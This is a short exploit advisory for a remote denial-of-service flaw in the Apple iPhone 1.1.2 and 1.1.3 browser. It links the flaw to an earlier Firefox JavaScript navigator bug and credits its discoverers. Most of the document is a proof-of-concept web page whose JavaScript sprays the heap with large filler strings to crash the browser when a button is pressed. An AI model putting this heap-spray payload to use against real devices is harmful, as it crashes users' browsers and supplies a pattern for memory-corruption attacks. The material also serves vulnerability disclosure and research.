Apple iPhone 1.1.3 remote DoS exploit
Vendor: Apple
Version affected: 1.1.2 and 1.1.3
Overview:The Apple iPhone remote DoS for 1.1.2 was discovered by c0ntex, but it
actually works on 1.1.3 as well. After further research it also appears that
this was a known issue with Firefox version 1.5.04 and was effected
cross-platform.
Called Mozilla Firefox JavaScript navigator Object Vulnerability.I recommend
you disable Java until Apple releases a fix or patch.
___________________________________
Proof of Concept (PoC):
<html><body><script>
function Demo() {
var shellcode;
var addr;
var fill;
alert('attempting a crash!');
shellcode = unescape('%u0c0c');
fill = unescape('%ucccc');
addr = 0x02020202;
var b = fill;
while (b.length <= 0x40000) b+=b;
var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) +
shellcode +
b.substring(0, 0x100000 - shellcode.length) +
shellcode +
b.substring(0, 0x100000 - shellcode.length) +
shellcode +
b.substring(0, 0x100000 - shellcode.length) +
shellcode;
}
}
</script>
<input type='button' onClick='Demo()' value='Go!'>
</body></html>
_________________________________________
Discovered by Joshua Morin